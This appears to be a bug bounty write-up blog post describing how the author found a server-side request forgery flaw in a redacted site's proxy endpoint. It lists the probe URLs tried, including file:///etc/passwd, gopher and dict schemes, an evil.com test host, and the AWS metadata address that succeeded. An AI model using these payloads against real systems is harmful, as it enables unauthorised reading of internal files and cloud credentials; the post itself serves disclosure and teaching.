Hi Mates, I am Akash Patil (@skypatil98) from India. I am in the bug bounty field from the last 2.5 years. My previous blog is all about the IDOR leads to Changing the password of all users (ATO) which I found on a Private Program. If you haven’t read that blog you can read it by following this link. If there are any grammatical mistakes, leave on it. Without wasting any time we will start with the article.
So let’s get started! 😉
In the Server-Side Request Forgery (SSRF) attack, the attacker can induce functionality on the server to read or update internal resources. The attacker may be able to read server configuration such as AWS metadata, connect to internal services like http-enabled databases or perform post requests towards internal services which are not intended to be exposed. Learn more about SSRF.
Let’s consider the target as
reducted.com
because I can’t disclose the program name.
After that I checked every request on burp http history and So I use Burp Search to find the possible parameters like,
url={target}
file={target}
filename={target}
top 25 params
And found a url= that looks like this.
reducted.com/gadgets/proxy/?url=
The URL was like https://reducted.com/gadgets/proxy/?url=https://evil.com
but failed :( It’s throwing an error
The URL was like
https://reducted.com/gadgets/proxy/?url=javascript:alert(1);
https://reducted.com/gadgets/proxy/?url=http://14.rs
https://reducted.com/gadgets/proxy?url=http://brutelogic.com.br/poc.svg
but failed :(
URL was like https://reducted.com/gadgets/proxy/?url=file:///etc/passwd
I tried URL schemas to read internal and make the server perform that actions [file:///
, dict://
, ftp://
, gopher://
] but :( Failed!
So I Visited the URL but it was not loading the content a simple text file gets reflected and downloaded it was having nothing in it.
After doing lots of other things I didn't get any result so I remember about the magic IP of AWS just for hit and try I replaced the URL parameter with the below IP which is the Magic IP used by the AWS.
Craft the URL like this:
https://reducted.com/gadgets/proxy/?url=http://169.254.169.254/latest/meta-data
This downloaded a reducted.txt
file and open it showed below information
After seeing the bounty amount I was like..😭😭😭😭😭
References:
Thanks for reading. If you have any question you can DM me on Twitter 😊
From Infosec Writeups: A lot is coming up in the Infosec every day that it’s hard to keep up with. Join our weekly newsletter to get all the latest Infosec trends in the form of 5 articles, 4 Threads, 3 videos, 2 Github Repos and tools, and 1 job alert for FREE!